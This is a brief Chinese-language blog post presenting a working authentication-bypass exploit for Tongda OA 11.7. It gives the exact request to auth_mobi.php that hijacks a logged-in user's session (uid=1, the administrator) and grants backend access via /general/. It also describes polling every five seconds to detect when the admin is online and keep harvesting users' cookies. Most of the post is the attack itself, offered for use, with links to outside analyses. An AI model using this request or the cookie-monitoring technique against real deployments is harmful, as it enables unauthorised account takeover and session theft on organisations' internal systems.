# 通达OA11.7 任意用户登陆
条件需要管理员在线
“`
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
“`
访问路径,覆盖了session直接用cookie登陆,访问目录/general/进入后台
访问目标后台 http://xxx.xxx.xxx.xxx/general/ 当目标离线时则访问漏洞页面则会出现:RELOGIN
5秒一次测试用户是否在线
通过此思路可以持续发包监控此页面来获取在线用户的Cookie
404实验室的分析:https://paper.seebug.org/1492/
ref:
* https://www.o2oxy.cn/3158.html
* https://mp.weixin.qq.com/s/5M40Oux_89dgy5QAUhULGg
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容